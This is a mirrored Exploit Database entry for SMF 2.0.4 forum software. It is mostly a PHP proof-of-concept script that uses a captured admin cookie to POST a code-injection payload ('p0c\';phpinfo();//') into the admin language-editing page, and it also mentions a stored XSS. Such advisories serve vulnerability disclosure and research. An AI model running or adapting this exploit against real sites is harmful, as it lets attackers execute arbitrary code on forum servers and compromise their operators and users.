SMF – ‘/index.php’ HTML Injection / Multiple PHP Code Injection Vulnerabilities

• Exploit Database
• 214 阅读

• 作者： Jakub Galczyk
  日期： 2013-04-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38491/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  source: https://www.securityfocus.com/bid/59409/info   SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities.   An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application.   SMF 2.0.4 is vulnerable; other versions may also be affected.   <?php   // proof of concept that latest SMF (2.0.4) can be exploited by php injection.   // payload code must escape from \&apos;, so you should try with something like // that: // p0c\&apos;;phpinfo();// as a &apos;dictionary&apos; value. Same story for locale // parameter. // For character_set - another story, as far as I remember, because here we // have // a nice stored xss. ;)   // 21/04/2013 // http://HauntIT.blogspot.com   // to successfully exploit smf 2.0.4 we need correct admin&apos;s cookie: $cookie = &apos;SMFCookie956=allCookiesHere&apos;; $ch = curl_init(&apos;http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english&apos;);   curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to &apos;On&apos;) curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\&apos;;phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   $page = curl_exec($ch);   echo &apos;PHP code:<br>&apos;.$page;   curl_close($ch); // to close &apos;logged-in&apos; part   ?>